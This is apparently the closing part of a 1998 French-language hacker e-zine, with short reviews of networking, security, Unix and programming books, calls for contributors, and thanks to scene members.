~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   Reseaux et telematique (tome 1 et 2)
   Auteurs: G.Pujolle, D.Seret, D.Dromart, E.Horlait.
   Editeur: Eyrolles
   Copyright Date : 1987

		Un vieux bouquin mais complet. Les auteurs nous parlent 
		aussi bien de la transmission d'informations que de l'
		architecture des reseaux, de la cryptographie, en passant
		par l'etude de transpac et de tymnet... C vraiment un bouquin
		complet et qui part des base... C'a interressera aussi bien les
		hacker que les phreaker...

   Les reseaux d'entreprise
   Auteur: Guy Pujolle
   Editeur:Eyrolles
   Copyright Date: 1984

		Vieux, vieux, vieux....
		PBX, Ethernet, Banube, Znet... C bon pour revoir ces bases...

   Telecommunication et reseaux
   Auteur: Guy Pujolle
   Editeur: Eyrolles
   Copyright Date:1992

		Voila quelque chose d'un peu plus recent... Toujour sur l'
		architecture des reseaux, leur ingieneries, etc.

   Initiation  l'architecture reseaux
   Auteur: Xavier Perras
   Editeur: Dunod
   Copyright Date: 1991

   Communication MODEMS Telematique
   Auteurs: Bernhard Richelmunn, Gerald List, Jochen Richter.
   Editeur: Micro Application
   Copyright Date: 1991

   Les reseaux sans fils 
   Auteur: J-M Perrichon
   Editeur: Masson
   Copyright Date: 1995

		Livre assez recent par rapport aux autre et  son sujet. 
            C vraiment le must pour la telephonie cellulaire. A lire
		sans hesiter.


Securite generale des systemes et des reseaux:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   Securite reseaux
   Auteurs: David J. Stang & Sylvia Moon
   Editeur: Dunod
   Copyright date: 1996

		Un bon livre qui parle vraiment de tout. De Unix aux 
		passerelles. Mais qui parfois manque de details. Dommage.   
   

Linux\Unix :
~~~~~~~~~~~~

   Linux
   Auteur : Timothy Parker (traduction)
   Editeur : s&sM
   Copyright Date :1997
	    
		Pour installer Linux et apprendre c rouage. Debutants 
		confirmes.


   Unix 
   Auteur : Michael Wielsh (traduction)
   Editeur : Micro Application
   Copyright Date : 1997

          Un tres bon bouquins passant entre autre du systeme de fichier 
	    la programmation du shell. De plus il a l'interet d'etre cour.

Beaucoup d'autre bouquins sont disponibles sur les les systemes 
d'exploitation. Et ce qu'on vous a site sont surtout fait pour les 
debutants. Mais on pense que les inities pourrons trouver les leurs.

Programmation :
~~~~~~~~~~~~~~~

   Le langage C.
   Auteur : Tony Zhang (traduction)
   Editeur : s&sM
   Copyright Date : 1997
		
		Pour debutant.

   Le langage C++.
   Auteur : Jesse Liberty
   Editeur : s&sM
   Copyright Date : 1997

		Meme chose : pour debutant.


C bouquins sont tous pour debutants. L'edition qu'on vous conseil si vous 
etes deja + un newbie est l'edition O'Reilly (mais avait on besoin de le 
rappeller??). www.editions-oreilly.fr/ 


   
Autres :
~~~~~~~~

   Disco Biscuit
   Auteurs: Beaucoup
   Editeur : Alpha Bleu etrangere 
   Copyright date : 1998

	    Un tres, tres bon livre sur la scene techno, house, trance, 
          Acide House,etc. Beaucoup d'ecsta et de popers en perspactive

Bon il y en a beaucoup d'autre, mais bon, on avaient un peu la flaime...
Si vous voulez nous soumettre d'autre bouquins c le moment, parce que nous
ca nous emmerde!!!!

 

				    /----------\
			     	   /(__)____(__)\
			         |#h/p/c/l/p-1|
			        /  xx/yy/1998  \
			        \##############/
			         \&&&&&&&&&&&&/
				    \__________/



PETITES ANNONCES :

On cherche :
quelqu'un de bon en ce qui concerne les modulars (pour qui c la SPECIALITE)
qui pourrait faire un article digne de ce nom.
Pareil pour les PBX ou PABX...
Des mecs bons en programmation (c++, java, c, Pascal, Borland, Delphi...),
pour une campagne anti microsoft sur le net.
On cherche tout simplement des gens doues, pour ecrire des art.


_____________  
Conclusion : \
______________\

voila pour cette premiere edition...
Faites nous part de vos impressions en ecrivant a :
h_p_c_l_plemag@yahoo.com.
On vous encourage sincerement  ecrire quelque chose pour le mag, c de VOUS
que la scene pourra avancer. Bref on espere que vous allez vous bouger un 
peu. Peur d'ecrire des choses ridicules ??? Il n'y a aucune peur  avoir.
Les lamers sont ceux qui n'ecrivent rien et qui se disent hacker. Les vraix 
hacker sont ceux qui font profiter leur connaissance aux autres (c dans la
charte du hacker) et surtout leur erreurs... On vous dit tout de suite que
le temps que le numero deux mettra a sortir sera proportionnel  ce que VOUS
ferez...


A bientot (peut etre).


Thanks :
--------
trom, SoD et Tripbomb qui ont ete les premiers a repondre a l'appel
Merci  Code-Bar, pour son aide et son soutien...
Merci a Psykaos (tant pis pour les majuscules) qui a failli ecrire un 
art. sur les Box, mais qui a ete frappe par une amnesie (temporaire, on l'
espere).
Merci  vous, oui VOUS qui derrieres votre ecran lisez ce mag pourri, qui
n'arrive pas a la cheville d'un Noroute ou Noway, maiq qui reanime la scene
francophone...
